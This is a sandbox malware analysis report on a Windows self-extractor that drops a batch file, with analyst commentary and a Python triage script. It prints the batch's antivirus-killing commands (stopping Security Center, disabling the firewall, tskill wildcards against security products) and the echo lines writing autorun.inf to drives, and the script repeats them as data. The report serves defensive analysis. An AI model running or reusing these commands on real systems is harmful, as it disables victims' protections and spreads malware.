
Windows Analysis Report
Mira_Dangerous.EXE.exe

Overview

General Information

Sample name: Mira_Dangerous.EXE.exe
Analysis ID: 1670104
MD5: 12bd30174702410955d46c23054a0fe6
SHA1: a0b47be3d815787f570becc5562e8e3483408ba3
SHA256: 36f099c1287b25cbbc278f852079e6d48d1ac3f69b76112c86ef13db6c37e91a
Tags: exe, user-FelloBoiYuuka

Detection

Score: 64
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Found evasive API chain checking for process token information
May infect USB drives
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process tree:

  • System is w10x64
  • Mira_Dangerous.EXE.exe (PID: 7084, cmdline: "C:\Users\user\Desktop\Mira_Dangerous.EXE.exe", MD5: 12BD30174702410955D46C23054A0FE6)
  • cleanup

Only this one process was analysed. No cmd.exe child executing the dropped MIRA_D~1.BAT appears in the tree, so what the batch file does (terminating security processes, disabling the firewall, writing autorun.inf to drives) is known from its static content and from memory strings, not from observed execution.

No configs have been found
No yara matches

Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe, ProcessId: 7084, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
The RunOnce value wextract_cleanup0 (advpack.dll DelNodeRunDLL32 on the IXP000.TMP directory) is the wextract self-extractor's own clean-up of its temporary extraction directory at next logon. The Sigma rule fires on any RunOnce write, so on its own this is not evidence of attacker persistence.

No Suricata rule has matched


AV Detection

Source: Mira_Dangerous.EXE.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\MIRA_D~1.BAT | Avira: detection malicious, Label: BAT/Agent.1275
Source: Mira_Dangerous.EXE.exe | Virustotal: Detection: 59%
Source: Mira_Dangerous.EXE.exe | ReversingLabs: Detection: 44%

Further signature evidence

Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA
Source: Mira_Dangerous.EXE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb | source: Mira_Dangerous.EXE.exe
Source: Binary string: wextract.pdbGCTL | source: Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: echo [AutoRun] > %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: echo open=[%%E:\%0] >> %%E:\autorun.inf
Source: Mira_Dangerous.EXE.exe, 00000000.00000003.1205707787.000001497A1BA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: echo action=Open folder to see files... >> %%E:\autorun.inf)
The same three strings recur in memory regions 00000000.00000003.1205801907.0000014978445000.00000004.00000020.00020000.00000000.sdmp and 00000000.00000003.1205896655.0000014978445000.00000004.00000020.00020000.00000000.sdmp and in the dropped file MIRA_D~1.BAT.0.dr.
These are the body of a batch for-loop (the doubled %%E is a for-variable holding a drive letter; the trailing ")" closes the loop) that writes an autorun.inf onto each drive pointing back at the batch file itself (%0), which is what the "May infect USB drives" signature keys on. Windows has not honoured autorun.inf on non-optical removable media since the 2011 AutoRun update, so spread via this file depends on the user opening it, not on automatic execution.
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code functions (no API list given): 0_2_00007FF7A8CC2DB4, 0_2_00007FF7A8CC6CA4, 0_2_00007FF7A8CC66C4, 0_2_00007FF7A8CC40C4, 0_2_00007FF7A8CC5D90, 0_2_00007FF7A8CC1D28, 0_2_00007FF7A8CC1C0C, 0_2_00007FF7A8CC3530
Source: Mira_Dangerous.EXE.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 2787 bytes, 1 file, at 0x2c +A "MIRA_D~1.BAT", ID 896, number 1, 1 datablock, 0x1503 compression
Source: Mira_Dangerous.EXE.exe | Binary or memory string: OriginalFilename vs Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exe, 00000000.00000000.1151640839.00007FF7A8CCE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Mira_Dangerous.EXE.exe
Source: Mira_Dangerous.EXE.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Mira_Dangerous.EXE.exe
Source: classification engine | Classification label: mal64.winEXE@1/1@0/0
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC6CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC2DB4 memset,memset,CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceExA,LoadResource,#17
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
Source: Mira_Dangerous.EXE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Sections loaded (in order, repeats collapsed): cabinet.dll, version.dll, textshaping.dll, uxtheme.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, feclient.dll, iertutil.dll, advpack.dll
Source: Mira_Dangerous.EXE.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: Mira_Dangerous.EXE.exe | Static PE information: data directories present: IMAGE_DIRECTORY_ENTRY_IMPORT, IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_BASERELOC, IMAGE_DIRECTORY_ENTRY_DEBUG, IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, IMAGE_DIRECTORY_ENTRY_IAT
Source: Mira_Dangerous.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Mira_Dangerous.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Mira_Dangerous.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Mira_Dangerous.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Mira_Dangerous.EXE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: Mira_Dangerous.EXE.exe | Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC1684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0 (reported four times)
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes (graph_0-2438)
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC8790 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC12EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle
Source: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe | Code function: 0_2_00007FF7A8CC8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter
The last three functions (SetUnhandledExceptionFilter/TerminateProcess and the GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, QueryPerformanceCounter sequence) are the MSVC CRT's startup and stack-cookie initialisation, present in any MSVC-linked binary; they are not sample-specific evasion or timing checks. The OpenProcessToken/GetTokenInformation/EqualSid routine is the extractor's check for membership in the Administrators group.
MITRE ATT&CK matrix (techniques with mapped signatures; the number is the count of signatures mapped to the technique)

Initial Access: Replication Through Removable Media (1)
Execution: Native API (2)
Persistence: Registry Run Keys / Startup Folder (1), DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1)
Defense Evasion: Access Token Manipulation (1), Timestomp (1), DLL Side-Loading (1)
Discovery: System Time Discovery (1), Peripheral Device Discovery (1), File and Directory Discovery (1), System Information Discovery (5)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2)
Impact: System Shutdown/Reboot (1)

No signatures map to Reconnaissance, Resource Development, Credential Access, Lateral Movement or Exfiltration; the remaining matrix cells (Gather Victim Identity Information, Acquire Infrastructure, OS Credential Dumping, LSASS Memory, Remote Services, Exfiltration Over Other Network Medium and the like) are unpopulated placeholders. The Encrypted Channel (2) entry corresponds to the two crypto-API signatures in the list (potential crypto function, Enhanced Cryptographic Provider); no network traffic was observed, so it should not be read as command-and-control.
Behavior Graph (ID: 1670104, Sample: Mira_Dangerous.EXE.exe, Startdate: 21/04/2025, Architecture: WINDOWS, Score: 64): the signature nodes "Antivirus detection for dropped file", "Antivirus / Scanner detection for submitted sample" and "Multi AV Scanner detection for submitted file" hang off the start node; the process node Mira_Dangerous.EXE.exe (graph counters 1 and 3) is started and drops C:\Users\user\AppData\Local\...\MIRA_D~1.BAT (DOS batch file).

Antivirus results for the submitted sample

Source | Detection | Scanner | Label
Mira_Dangerous.EXE.exe | 59% | Virustotal | (no label)
Mira_Dangerous.EXE.exe | 44% | ReversingLabs | Win64.Trojan.KillAV
Mira_Dangerous.EXE.exe | 100% | Avira | BAT/Agent.1275

Antivirus results for dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\IXP000.TMP\MIRA_D~1.BAT | 100% | Avira | BAT/Agent.1275

No antivirus matches in the report's other three categories.
No contacted domains info
No contacted IP infos
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1670104
Start date and time: 2025-04-21 05:29:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 17s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Mira_Dangerous.EXE.exe
Detection: MAL
Classification: mal64.winEXE@1/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 25
  • Number of non-executed functions: 31
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
No simulations
No context (all five context tables are empty)
Dropped file: C:\Users\user\AppData\Local\Temp\IXP000.TMP\MIRA_D~1.BAT

Process: C:\Users\user\Desktop\Mira_Dangerous.EXE.exe
File Type: DOS batch file, Non-ISO extended-ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 11542
Entropy (8bit): 5.343447696512908
Encrypted: false
SSDEEP: 96:XRfeAgV/RBA7lPxODVbi1qkaZM43Qp19AU4c8cppdDmjEDgPzRVri/u1FKY2x:XRlA/2lPxOpbrZ2p19AU4c8gbDkMgPe
MD5: 6BD574A1523A552FAD065777400841DD
SHA1: C1552C362FBDB69FADF8535675FE9C91B55BEA75
SHA-256: A247F8867A0C5C3C6CF62B371085196E73E10A09E2A39D183B5B6578986439FF
SHA-512: 2E5A0726F060DCFE66156F6C0881675B9DBEB60DB6AB42499559BE681345CAB289237C4368872350DAF89E97BBCDF200C249229827CCD7119104F1A5B5F830D8
Malicious: true
Antivirus: Avira, Detection: 100%
Reputation: low
Preview (the sandbox renders each CR LF pair as ".."; line breaks are restored below; the preview is truncated by the sandbox, and the two characters around Security Center are non-ASCII bytes shown as "."):

@echo off
start cock.co.ck
rem -------kill av---------
net stop .Security Center.
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
(preview truncated)
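As an added triage example (not code from Joe Sandbox or from the sample), the following Python parses a batch excerpt transcribed from the preview above, shows which processes of a constructed running-process list the tskill wildcards would terminate, and reconstructs the autorun.inf the recovered echo lines would write onto a drive. The batch text (with ASCII quotes assumed around Security Center), the process list, and the %%E / %0 substitutions are constructions or assumptions made for this example.

```python
"""Triage helpers for the dropped batch file.  Added example; not code from
Joe Sandbox or from the sample.  SAMPLE_BATCH is transcribed from the
report's truncated preview (CRLF restored, most tskill lines omitted,
ASCII quotes assumed around Security Center); AUTORUN_ECHOES are the
autorun.inf lines recovered from the report's memory strings.  The running
process list and the %%E / %0 substitutions are assumptions for illustration."""
import re

SAMPLE_BATCH = """@echo off
start cock.co.ck
rem -------kill av---------
net stop "Security Center"
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A nv*
tskill /A avg*
tskill /A msmp*
tskill /A mcafe*
tskill /A msiexec
tskill /A cc*
tskill /A norton au*
"""

AUTORUN_ECHOES = [
    r"echo [AutoRun] > %%E:\autorun.inf",
    r"echo open=[%%E:\%0] >> %%E:\autorun.inf",
    r"echo action=Open folder to see files... >> %%E:\autorun.inf)",
]

TSKILL_RE = re.compile(r"^\s*tskill\s+/A\s+(.+?)\s*$", re.I)  # /A: every session
NETSTOP_RE = re.compile(r'^\s*net\s+stop\s+"?([^"]+?)"?\s*$', re.I)
FIREWALL_RE = re.compile(r"^\s*netsh\s+firewall\s+set\s+opmode\s+mode=disable", re.I)
ECHO_RE = re.compile(r"^\s*echo\s+(.*?)\s*>{1,2}\s*(\S+?)\)?\s*$", re.I)


def parse_batch(text):
    """Summarise the hostile commands found in a batch script."""
    summary = {"killed_patterns": [], "services_stopped": [], "firewall_disabled": False,
               "autorun_lines": [], "start_targets": []}
    for line in text.splitlines():
        if m := TSKILL_RE.match(line):
            summary["killed_patterns"].append(m.group(1))
        elif m := NETSTOP_RE.match(line):
            summary["services_stopped"].append(m.group(1))
        elif FIREWALL_RE.match(line):
            summary["firewall_disabled"] = True  # deprecated "netsh firewall" context
        elif "autorun.inf" in line.lower() and ECHO_RE.match(line):
            summary["autorun_lines"].append(line)
        elif line.lower().startswith("start "):
            summary["start_targets"].append(line.split(None, 1)[1].strip())
    return summary


def tskill_regex(pattern):
    """tskill matches the image name without '.exe', case-insensitively, with
    '*' as a wildcard (assumed semantics for this example)."""
    return re.compile("^" + re.escape(pattern).replace(r"\*", ".*") + "$", re.I)


def processes_hit(patterns, running):
    """Which of the running image names would the tskill lines terminate?"""
    regexes = [tskill_regex(p) for p in patterns]
    return sorted(img for img in running
                  if any(r.match(img.rsplit(".", 1)[0]) for r in regexes))


def render_autorun(echo_lines, drive, script):
    """Reconstruct the autorun.inf the batch's for-loop writes on one drive:
    %%E is the loop variable (drive letter) and %0 the batch's own name as
    invoked.  Returns (target path, file content)."""
    target, body = None, []
    for line in echo_lines:
        m = ECHO_RE.match(line)
        if not m:
            continue
        payload, target = (s.replace("%%E", drive).replace("%0", script) for s in m.groups())
        body.append(payload)
    return target, "\n".join(body)


if __name__ == "__main__":
    summary = parse_batch(SAMPLE_BATCH)
    running = ["MsMpEng.exe", "avgui.exe", "AvastSvc.exe", "ccSvcHst.exe",   # constructed
               "nvcontainer.exe", "msiexec.exe", "explorer.exe", "svchost.exe"]
    print("firewall disabled:", summary["firewall_disabled"], "| stopped:", summary["services_stopped"])
    print("would terminate:", processes_hit(summary["killed_patterns"], running))
    print(*render_autorun(AUTORUN_ECHOES, "E", "MIRA_D~1.BAT"), sep="\n")
```

The wildcard patterns are broad enough to hit software that has nothing to do with security (nv* takes the constructed nvcontainer.exe along with the Defender, Avast, AVG and Symantec names), and msiexec is killed by name, so a host running this script would also show failed installs and unrelated crashes. The reconstructed autorun.inf is what ends up on each drive; whether the open= entry is ever honoured is a separate question, since current Windows ignores autorun.inf on USB media.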
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.8174006380421455
TrID:
  • Win64 Executable GUI (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Mira_Dangerous.EXE.exe
File size: 160'256 bytes
MD5: 12bd30174702410955d46c23054a0fe6
SHA1: a0b47be3d815787f570becc5562e8e3483408ba3
SHA256: 36f099c1287b25cbbc278f852079e6d48d1ac3f69b76112c86ef13db6c37e91a
SHA512: f4eac97347ddf86ba8d342a7d4da21292ca1a5411e9ede8bf00feaa7c702185be108e2cd562c0e9024a4f53577730ff90b8c24fa5e06eb9e7c7590d7160c4fe6
SSDEEP: 3072:oahKyd2n31q95GWp1icKAArDZz4N9GhbkrNEk1QT:oahOup0yN90QEj
TLSH: CAF38D4A63E420B6E4B6577498F202935A32BCB19F7582FF22C4D57E1E336C0A532B57
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."
Icon Hash: 3b6120282c4c5a1f
Entrypoint: 0x140008200
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks: none listed
CLR (.Net) Version: none
OS Version Major: 10
OS Version Minor: 0
File Version Major: 10
File Version Minor: 0
Subsystem Version Major: 10
Subsystem Version Minor: 0
Import Hash: 4cea7ae85c87ddc7295d39ff9cda31d1
Instruction (entry-point disassembly as rendered by the sandbox). Note that the listing decodes this x64 code in 32-bit mode: the "dec eax", "inc ecx", "dec ecx" and "dec esp" lines are the REX prefix bytes 48h, 41h, 49h and 4Ch of the instruction that follows, not real arithmetic, so "dec eax / sub esp, 28h" is sub rsp, 28h. The opening sequence (sub rsp, 28h; call; add rsp, 28h; jmp) is the standard MSVC x64 CRT entry stub that initialises the stack cookie and jumps to the CRT's common main, not sample-specific code.
dec eax
sub esp, 28h
call 00007F6E048BC0A0h
dec eax
add esp, 28h
jmp 00007F6E048BB94Bh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000011CDh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [00004922h], ebx
je 00007F6E048BB94Ch
dec eax
cmp eax, ebx
jne 00007F6E048BB95Ch
mov edi, 00000001h
mov eax, dword ptr [00004918h]
cmp eax, 01h
jne 00007F6E048BB959h
lea ecx, dword ptr [eax+1Eh]
call 00007F6E048BBF33h
jmp 00007F6E048BB9BCh
mov ecx, 000003E8h
call dword ptr [0000117Eh]
jmp 00007F6E048BB909h
mov eax, dword ptr [000048F6h]
test eax, eax
jne 00007F6E048BB99Bh
mov dword ptr [000048E8h], 00000001h
dec esp
lea esi, dword ptr [000013E9h]
dec eax
lea ebx, dword ptr [000013CAh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F6E048BB967h
test eax, eax
jne 00007F6E048BB967h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F6E048BB952h
dec eax
mov eax, dword ptr [ebx]
dec eax
mov ecx, dword ptr [00001388h]
Data directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa23c | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1c130 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x408 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2c000 | 0x20 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a10 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x118 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9128 | 0x520 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7b80 | 0x7c00 | 60800deac1fde21b98089f2241ee6168 | False | 0.5499936995967742 | data | 6.096261782871538 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x22c8 | 0x2400 | 59d15cdf89780817c3d48dd588a6a129 | False | 0.4136284722222222 | data | 4.727841929207054 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xc000 | 0x1f00 | 0x400 | 9d1580dccaf8e787a43caf4bba48a079 | False | 0.3212890625 | data | 3.1889769845125677 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0xe000 | 0x408 | 0x600 | 15cd12257317071f28e4f7b728f8825e | False | 0.3932291666666667 | data | 3.1563665040475675 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0x1d000 | 0x1c200 | 33cfc8d11525f17bcdfb6630ba153019 | False | 0.7305729166666667 | data | 7.009359201962884 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2c000 | 0x20 | 0x200 | 637787151ee546a94902de9694a58fd6 | False | 0.083984375 | data | 0.4068473715812382 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources (Language / Country is English /United States for every entry)

Name | RVA | Size | Type | ZLIB Complexity
AVI | 0xf9f8 | 0x2e1a | RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp | 0.2713099474665311
RT_ICON | 0x12814 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | 0.3225609756097561
RT_ICON | 0x12e7c | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | 0.41263440860215056
RT_ICON | 0x13164 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | 0.4569672131147541
RT_ICON | 0x1334c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | 0.5574324324324325
RT_ICON | 0x13474 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | 0.6223347547974414
RT_ICON | 0x1431c | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | 0.7369133574007221
RT_ICON | 0x14bc4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | 0.783410138248848
RT_ICON | 0x1528c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | 0.3829479768786127
RT_ICON | 0x157f4 | 0xd9d2 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | 1.0004662673505254
RT_ICON | 0x231c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | 0.5300829875518672
RT_ICON | 0x25770 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | 0.6137429643527205
RT_ICON | 0x26818 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | 0.703688524590164
RT_ICON | 0x271a0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | 0.425531914893617
RT_DIALOG | 0x27608 | 0x2f2 | data | 0.4389920424403183
RT_DIALOG | 0x278fc | 0x1b0 | data | 0.5625
RT_DIALOG | 0x27aac | 0x166 | data | 0.5223463687150838
RT_DIALOG | 0x27c14 | 0x1c0 | data | 0.5446428571428571
RT_DIALOG | 0x27dd4 | 0x130 | data | 0.5526315789473685
RT_DIALOG | 0x27f04 | 0x120 | data | 0.5763888888888888
RT_STRING | 0x28024 | 0x8c | Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0 | 0.6214285714285714
RT_STRING | 0x280b0 | 0x520 | data | 0.4032012195121951
RT_STRING | 0x285d0 | 0x5cc | data | 0.36455525606469
RT_STRING | 0x28b9c | 0x4b0 | data | 0.385
RT_STRING | 0x2904c | 0x44a | data | 0.3970856102003643
RT_STRING | 0x29498 | 0x3ce | data | 0.36858316221765913
RT_RCDATA | 0x29868 | 0x7 | ASCII text, with no line terminators | 2.142857142857143
